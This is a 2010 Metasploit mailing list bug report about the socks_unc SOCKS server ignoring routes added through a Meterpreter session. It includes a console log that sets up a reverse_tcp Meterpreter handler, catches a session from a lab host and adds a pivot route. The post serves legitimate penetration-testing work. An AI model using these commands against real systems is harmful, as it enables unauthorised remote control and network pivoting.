Metasploit mailing list archives
Bug report or Feature request socks_unc/route
From: Mark Baggett <lo127001 () gmail com>
Date: Tue, 16 Mar 2010 21:55:31 -0400
I don't know if this is a bug or a product enhancement, but here it goes....
I want to use Proxychains to route nmap, nessus and other tcp/udp tools through a meterpreter session. After I get Meterpreter on a host as session 1 I want to add a route and use the SOCKS_UNC server with proxychains. Similar to these vids but instead of an SSH server use the SOCKS_UNC auxiliary module:
http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.htmlBut the SOCKS_UNC server doesn't use the route that is added and packets still route locally. Here is what I did..
root@bt:/pentest/exploits/framework3# ./msfconsole _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) |_| =[ metasploit v3.3.4-dev [core:3.3 api:1.0] + -- --=[ 533 exploits - 254 auxiliary + -- --=[ 198 payloads - 23 encoders - 8 nops =[ svn r8826 updated today (2010.03.15) msf > color false msf > use multi/handler msf exploit(handler) > set LHOST 172.16.186.132 LHOST => 172.16.186.132 msf exploit(handler) > set LPORT 80 LPORT => 80 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- -----------EXITFUNC process yes Exit technique: seh, thread, process
LHOST 172.16.186.132 yes The local address LPORT 80 yes The local port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse handler on 172.16.186.132:80 [*] Starting the payload handler... [*] Sending stage (748032 bytes)[*] Meterpreter session 1 opened (172.16.186.132:80 -> 172.16.186.128:3782)
meterpreter > Background session 1? [y/N] y [-] Unknown command: y. msf exploit(handler) > route add 0.0.0.0 0.0.0.0 1 msf exploit(handler) > back use server/socksmsf > use server/socks_unc msf auxiliary(socks_unc) > set SRVPORT 9050 SRVPORT => 9050 msf auxiliary(socks_unc) > set SRVHOST 172.16.186.132 SRVHOST => 172.16.186.132 msf auxiliary(socks_unc) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 172.16.186.132 yes The local host to listen on. SRVPORT 9050 yes The local port to listen on.SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
UNCHOST no The address of the UNC host. Thanks, Mark Baggett
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Bug report or Feature request socks_unc/route Mark Baggett (Mar 16)
- Re: Bug report or Feature request socks_unc/route HD Moore (Mar 17)